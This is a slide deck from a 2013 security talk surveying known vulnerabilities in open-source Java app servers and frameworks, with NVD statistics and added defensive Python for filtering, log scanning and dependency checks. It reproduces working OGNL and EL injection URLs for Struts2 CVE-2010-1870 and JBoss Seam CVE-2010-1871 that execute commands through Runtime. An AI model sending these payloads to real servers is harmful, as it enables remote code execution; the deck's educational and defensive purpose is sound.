Security Vulnerabilities in Open Source Java Libraries - Yonita


Nov 12, 2013


Security Vulnerabilities in Open Source Java Libraries

Patrycja Wegrzynowicz
CTO, Yonita, Inc.
About Me

- Programmer at heart
- Researcher in mind
- Speaker with passion
- Entrepreneur by need

@yonlabs
 
Agenda

- Motivation and methodology
- Security vulnerabilities
  - Stats and examples
  - App and web servers
  - Web frameworks
- Approach to security
  - What to look for
  - Where to look at
Disclaimer

I do not aim at bashing OSS!
"Hello World in cloud is involve 1 load balancer, 3 web server and 2 database server"
DevOps_Borat, Twitter
 
Underneath

Application
Libraries
App & Web Servers
Databases
Operating Systems
Infrastructure
Sources

- The National Vulnerability Database
  - NIST Computer Security Division
  - DHS National Cyber Security Division / US-CERT
  - http://nvd.nist.gov/
- The Open Source Vulnerability Database
  - Open Security Foundation
  - http://www.osvdb.org/
- The Exploit Database
  - http://www.exploit-db.com/
Common Vulnerability Scoring System v2

Base metrics and their possible values:

Access Vector       Local | Adjacent network | Network (remote)
Access Complexity   High | Medium | Low
Authentication      Multiple instances | Single instance | None
Confidentiality     None | Partial | Complete
Integrity           None | Partial | Complete
Availability        None | Partial | Complete
Common Weakness Enumeration

Vulnerability Types: NVD to CWE Mapping

- Authentication Issues
- Credentials Management
- Permissions, Privileges, and Access Control
- Buffer Errors
- Cross-Site Request Forgery (CSRF)
- Cross-Site Scripting (XSS)
- Cryptographic Issues
- Path Traversal
- Code Injection
- Format String Vulnerability
- Configuration
- Information Leak/Disclosure
- Input Validation
- Numeric Errors
- OS Command Injections
- Race Condition
- Resource Management Errors
- SQL Injection
- Link Following
- Other

Not in CWE:
- Insufficient Information
- Design Error
App & Web Servers

Application server usage share (survey by ZeroTurnaround):

Tomcat      33%
JBoss       26%
WebLogic    10%
Jetty        8%
GlassFish    8%
WebSphere    7%
Other        8%
Number of Vulnerabilities: OSS

Tomcat      100
JBoss AS      7
JBoss EAP    20
GlassFish    14
Jetty        20

Based on NVD
Number of Vulnerabilities: OSS and Proprietary

Tomcat      100
JBoss AS      7
JBoss EAP    20
GlassFish    14
Jetty        20
WebLogic    185
WebSphere   201

Based on NVD
Number of Vulnerabilities: OSS vs Proprietary

OSS (5 platforms)           29%
Proprietary (2 platforms)   71%

Based on NVD
Vulnerabilities by Year: OSS

[Chart: vulnerabilities per year, 2000-2012, for Tomcat, JBoss AS, JBoss EAP, GlassFish and Jetty]

Based on NVD
Vulnerabilities by Year: OSS + Proprietary

[Chart: vulnerabilities per year, 2000-2012, for Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic and WebSphere]

Based on NVD
Vulnerabilities by Year: OSS (stacked view)

[Chart: vulnerabilities per year, 2000-2012, Jetty, GlassFish, JBoss EAP, JBoss AS and Tomcat stacked]

Based on NVD
Vulnerabilities by Year: OSS and Proprietary (stacked view)

[Chart: vulnerabilities per year, 2000-2012, WebSphere, WebLogic, Jetty, GlassFish, JBoss EAP, JBoss AS and Tomcat stacked]

Based on NVD
Vulnerabilities Scoring

[Chart: vulnerability counts per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere) by CVSS v2 score band]

Bands used on the slide:
LOW [0,4)  MEDIUM [4,7)  HIGH [7,8)  CRITICAL [8,9)  WTF?! [9,10]

Based on NVD
Confidentiality Impact

            None   Partial   Complete
Tomcat        36        62          2
JBoss AS       0         6          1
JBoss EAP      6        13          0
GlassFish      7         6          1
Jetty          8        12          0
WebLogic      51       112         22
WebSphere     71        99         32

Based on NVD
Integrity Impact

            None   Partial   Complete
Tomcat        55        45          0
JBoss AS       2         4          1
JBoss EAP     10         9          0
GlassFish      5         8          1
Jetty          9        11          0
WebLogic      76        91         18
WebSphere     71        99         32

Based on NVD
Availability Impact

            None   Partial   Complete
Tomcat        71        28          1
JBoss AS       2         4          1
JBoss EAP     11         9          0
GlassFish      6         5          3
Jetty         14         6          0
WebLogic      82        83         20
WebSphere     71        99         32

Based on NVD
Vulnerability Types by Server

[Chart: percentage breakdown of vulnerability types per server; legend: Authentication Issues, Credentials Management, Permissions/Privileges/Access Control, Buffer Errors, CSRF, XSS, Cryptographic Issues, Path Traversal, Code Injection, Configuration, Information Leak, Input Validation, Numeric Errors, Race Condition, Resource Management Errors, SQL Injection, Link Following, Design Error, Unknown]

Based on NVD
Top 3 Vulnerabilities

[Chart: the three most frequent vulnerability types per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere); types appearing: Credentials Management, Permissions/Privileges/Access Control, CSRF, XSS, Path Traversal, Information Leak, Input Validation]

Based on NVD
3 and More Vulnerabilities

[Chart: vulnerability types with three or more occurrences per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere); types appearing: Authentication Issues, Credentials Management, Permissions/Privileges/Access Control, CSRF, XSS, Cryptographic Issues, Path Traversal, Configuration, Information Leak, Input Validation, Resource Management Errors, Design Error]

Based on NVD
Total Vulnerabilities by Type

[Chart: totals per type, stacked by server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere); types ordered as on the chart:]

1. Cross-Site Scripting (XSS)
2. Permissions, Privileges, and Access Control
3. Information Leak
4. Input Validation
5. Resource Management Errors
6. Design Error
7. Cryptographic Issues
8. Path Traversal
9. Authentication Issues
10. Credentials Management
11. Cross-Site Request Forgery
12. Configuration
13. Buffer Errors
14. Code Injection
15. Numeric Errors
16. Race Condition
17. Link Following
18. SQL Injection

Based on NVD
Max CVSS v2: 10

CVE-2011-0807 (2011-04-20)

Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration.

AV: Network
AC: Low
Au: None required
C: Complete
I: Complete
A: Complete

Type: Insufficient information
Min CVSS v2: 1.2

CVE-2010-3718 (2011-02-10)

Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

AV: Local access
AC: High
Au: None required
C: None
I: Partial
A: None

Type: Design Error
Web Frameworks

Vulnerabilities: Selected Frameworks

[Chart: number of vulnerabilities for Struts2, JBoss Seam and GWT]

Apache Struts 2 (latest release 2.3.4.1)

CVE-ID          Type(s)     Score   Access   Complexity   Authentication   Confidentiality   Integrity   Availability
CVE-2012-4387   DoS         5.0     Remote   Low          Not required     None              None        Partial
CVE-2012-4386   CSRF        6.8     Remote   Medium       Not required     Partial           Partial     Partial
CVE-2012-1006   XSS         4.3     Remote   Medium       Not required     None              Partial     None
CVE-2012-0838   Exec Code   7.5     Remote   Low          Not required     Partial           Partial     Partial
CVE-2012-0394   Exec Code   6.8     Remote   Medium       Not required     Partial           Partial     Partial
CVE-2012-0393               6.4     Remote   Low          Not required     None              Partial     Partial
CVE-2012-0392   Exec Code   9.3     Remote   Medium       Not required     Complete          Complete    Complete
CVE-2012-0391   Exec Code   9.3     Remote   Medium       Not required     Complete          Complete    Complete

NVD descriptions (as shown on the slide, some cut off):

CVE-2012-0838: The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.

CVE-2012-0391: The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code ...

CVE-2012-4387: Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.

CVE-2012-4386: The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name ...

CVE-2012-1006: Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName ...

CVE-2012-0392: Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.

CVE-2012-0394: ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a ...

CVE-2012-0393: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a ...
CVE-2010-1870 exploit (Struts2)

- Found by and exploit shown by Meder Kydyraliev
- Based on his previous bug: XW-641

Parameter name sent by the attacker:

('\u0023' + 'session[\'user\']')(unused)=0wn3d

What OGNL evaluates it to:

#session['user']=0wn3d

What that does on the server:

ActionContext.getContext().getSession().put("user", "0wn3d")

- ParametersInterceptor blacklists # to prevent tampering with server-side data
- The blacklist inspects the raw parameter name, while OGNL decodes the unicode escape '\u0023' to '#' only when it evaluates the expression, so the denied character never reaches the check
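The three lines above show why a character blacklist on parameter names failed: the name is itself an OGNL expression, and '\u0023' is the Java/OGNL unicode escape for '#', so the raw bytes of the name never contain the denied character. The Python below is an added illustration and not Struts source: it models the check as the deck describes it (reject names containing '#'), shows that the slide's payload passes it, that the payload does contain '#' once unicode escapes are decoded the way an expression lexer decodes them, and that a property-path allowlist rejects the payload outright while still accepting ordinary names. The allowlist pattern is a hypothetical one written for this example, not the expression Struts later shipped.

```python
"""Denylist vs allowlist on Struts 2 parameter names, using the CVE-2010-1870 payload from the slide."""
import re

# The parameter name from the slide, exactly as it travels in the request (backslashes literal).
PAYLOAD_NAME = r"('\u0023' + 'session[\'user\']')(unused)"
BENIGN_NAME = "user.address.city"

# Hypothetical allowlist for this example: dotted property paths, optionally indexed by a
# number or a simple quoted key. Not the regular expression Struts itself adopted.
ALLOWLIST = re.compile(
    r"^[A-Za-z][A-Za-z0-9_]*(\.[A-Za-z][A-Za-z0-9_]*|\[(\d+|'[A-Za-z0-9_]+')\])*$"
)

_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")


def denylist_accepts(name):
    """The vulnerable check as described on the slide: reject only names that literally contain '#'."""
    return "#" not in name


def decode_unicode_escapes(s):
    """Apply Java-style \\uXXXX decoding, as an OGNL lexer does inside string literals."""
    return _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def allowlist_accepts(name):
    """The hardened check: accept only names that match a property-path grammar."""
    return ALLOWLIST.fullmatch(name) is not None


def classify(name):
    """Summarise how the two checks treat one parameter name."""
    decoded = decode_unicode_escapes(name)
    return {
        "name": name,
        "denylist_accepts": denylist_accepts(name),
        "contains_hash_after_decoding": "#" in decoded,
        "allowlist_accepts": allowlist_accepts(name),
    }


if __name__ == "__main__":
    for n in (BENIGN_NAME, PAYLOAD_NAME):
        print(classify(n))
```

The point of the comparison is that the allowlist never needs to know about '\u0023', percent-encoding or any other escape: anything that is not a plain property path is refused before an expression evaluator sees it, which is the only defence that holds when the evaluator's grammar is richer than the filter's.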
CVE-2010-1870: Struts 2

2010-08-17

The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the # protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability ...

AV: Network
AC: Low
Au: None required
C: None
I: Partial
A: None

Type: Design Error (NVD-CWE-DesignError)
CVE-2010-1870 exploit

Guards that have to be switched off:
- xwork.MethodAccessor.denyMethodExecution
- #_memberAccess.allowStaticMethodAccess

Exploit by Meder Kydyraliev (OGNL steps):

#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java.lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec("touch /tmp/dir", null)

The same steps packed into one request (as shown on the slide):

/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023rt\  ('mkdir\u0020/tmp/PWNED'\u002cnull)))=1
CVE-2010-1871: JBoss Seam

2010-08-05

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Type: Input Validation
CVE-2010-1871 exploit

Found by and exploit provided by Meder Kydyraliev:

/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null), 'mkdir /tmp/PWNED')}
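Both exploit URLs in this part of the deck share visible markers: OGNL context variables and the XWork guard names, '#{' expression syntax, '@class@method' static calls, and reflective access to java.lang.Runtime, all wrapped in percent-encoding and \uXXXX escapes. The Python below is an added detection example, not part of the talk: it extracts the request target from access-log lines, undoes both encodings, and reports which indicators fire. The log lines are constructed for the example (two of them carry the deck's payloads, two are benign), and the indicator list is this example's own, not a published ruleset.

```python
"""Flag request lines carrying OGNL / EL injection markers like the two exploit URLs on the slides."""
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic): the deck's two payloads plus two benign requests.
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Nov/2013:10:00:01 +0000] "GET /HelloWorld.action?name=patrycja HTTP/1.1" 200 512
10.0.0.7 - - [12/Nov/2013:10:00:02 +0000] "GET /HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))=1 HTTP/1.1" 200 77
10.0.0.9 - - [12/Nov/2013:10:00:03 +0000] "GET /seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null)} HTTP/1.1" 200 1024
10.0.0.5 - - [12/Nov/2013:10:00:04 +0000] "GET /seam-booking/home.seam?actionOutcome=/hotels.xhtml HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")

# Indicators, matched against the fully decoded target.
INDICATORS = [
    ("ognl-context", re.compile(r"#_memberAccess|#context|xwork\.MethodAccessor")),
    ("el-expression", re.compile(r"[#$]\{")),
    ("static-call", re.compile(r"@java\.lang\.\w+@")),
    ("runtime-reflection", re.compile(r"java\.lang\.Runtime|getDeclaredMethods|\.exec\(")),
]


def normalize(target):
    """Undo the encodings an attacker layers on: URL percent-encoding, then \\uXXXX escapes."""
    decoded = unquote(target)
    return _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), decoded)


def scan_line(line):
    """Return the indicator names that fire for one log line (empty list for benign lines)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    norm = normalize(m.group("target"))
    return [name for name, rx in INDICATORS if rx.search(norm)]


def scan_log(text):
    """Map each suspicious request target to the indicators it triggered."""
    hits = {}
    for line in text.strip().splitlines():
        indicators = scan_line(line)
        if indicators:
            hits[REQUEST_RE.search(line).group("target")] = indicators
    return hits


if __name__ == "__main__":
    for target, why in scan_log(SAMPLE_LOG).items():
        print(why, target[:80])
```

Decoding before matching is what makes this useful: the Seam payload hides '#{' as '%23{' and the Struts payload hides '#' as '\u0023', so a rule run against the raw line would miss both.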
How to Assess the Security Level of a Library?

What to Look For?

- Vulnerabilities and trend
- Complexity
- Culture

Culture

"The best indicator of the library's future security is culture that places value on security and clear evidence of broad and rigorous security analysis."
Jeff Williams, CEO, Aspect Security
What to Look For?

- Known security vulnerabilities in an OSS library and trends
- Library complexity, its design and its dependencies
- Security in the software development process of an OSS library
  - Security during development
    - Security built into the development process
  - Security during issue handling
    - Clear and transparent issue handling
    - Undisclosed details until fixed
    - Security response team
    - Security bulletins
    - Releases and release notes containing security information
Where to Look At?

- Vulnerability databases
  - Open Source Vulnerability Database
  - National Vulnerability Database
  - Exploit Database
- Vendor site
  - Development process
  - Issue tracker
  - Security bulletins
  - Release notes
- Dependency hell
  - Use the support of a dependency management tool (e.g. update reports in Maven)
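The last item, comparing the versions a build actually pulls in against known vulnerabilities, can be done directly against a pom.xml. The Python below is an added example, not the talk's code or a Maven plugin: it reads the struts2-core version from a constructed pom fragment and matches it against the affected ranges taken from the NVD descriptions of the Struts 2 CVEs tabulated earlier in the deck (for instance CVE-2012-4387 affects 2.0.0 through 2.3.4, so the 2.3.4.1 release named on the slide is clear of it). The pom and the range encoding are constructed for the example, and the version comparison deliberately drops non-numeric qualifiers, which is simpler than Maven's own version ordering.

```python
"""Check a pom.xml dependency version against the affected ranges of the Struts 2 CVEs in the deck."""
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Constructed pom fragment (not a real project).
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId><artifactId>demo</artifactId><version>1.0</version>
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>2.2.3</version>
    </dependency>
    <dependency>
      <groupId>junit</groupId><artifactId>junit</artifactId><version>4.11</version>
    </dependency>
  </dependencies>
</project>"""

# Affected ranges as stated in the NVD descriptions on the Struts 2 slide.
# Rule: (cve, lower bound inclusive or None, upper bound, upper bound inclusive?, exact versions or None)
STRUTS2_RULES = [
    ("CVE-2012-0838", None, "2.3.1.1", False, None),          # before 2.3.1.1
    ("CVE-2012-0394", None, "2.3.1.1", False, None),          # before 2.3.1.1 (developer mode)
    ("CVE-2012-0393", None, "2.3.1.1", False, None),          # before 2.3.1.1
    ("CVE-2012-0392", None, "2.2.3.1", False, None),          # before 2.2.3.1
    ("CVE-2012-0391", None, "2.2.3.1", False, None),          # before 2.2.3.1
    ("CVE-2012-4387", "2.0.0", "2.3.4", True, None),          # 2.0.0 through 2.3.4
    ("CVE-2012-4386", "2.0.0", "2.3.4", True, None),          # 2.0.0 through 2.3.4
    ("CVE-2012-1006", None, None, False, ("2.0.14", "2.2.3")),  # exactly these releases
]


def parse_version(v):
    """'2.3.4.1' -> (2, 3, 4, 1); a non-numeric qualifier ends the comparison key."""
    parts = []
    for p in v.split("."):
        digits = "".join(ch for ch in p if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def affected(version, rule):
    """True if `version` falls inside the rule's affected range."""
    _, low, high, high_incl, exact = rule
    v = parse_version(version)
    if exact is not None:
        return v in {parse_version(e) for e in exact}
    if low is not None and v < parse_version(low):
        return False
    h = parse_version(high)
    return v <= h if high_incl else v < h


def matching_cves(version):
    return [r[0] for r in STRUTS2_RULES if affected(version, r)]


def struts2_version(pom_xml):
    """Return the declared struts2-core version, or None if the pom does not depend on it."""
    root = ET.fromstring(pom_xml)
    for dep in root.findall(".//m:dependency", NS):
        g = dep.findtext("m:groupId", namespaces=NS)
        a = dep.findtext("m:artifactId", namespaces=NS)
        if g == "org.apache.struts" and a == "struts2-core":
            return dep.findtext("m:version", namespaces=NS)
    return None


if __name__ == "__main__":
    v = struts2_version(SAMPLE_POM)
    print(v, matching_cves(v))
```

For the constructed pom the declared 2.2.3 matches all eight CVEs, including CVE-2012-1006, which names that exact release; versions inherited through parent poms, properties or transitive dependencies are not resolved here, which is why the deck points at the dependency management tool's own update reports rather than hand-reading the file.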
 
patrycja@yonita.com
@yonlabs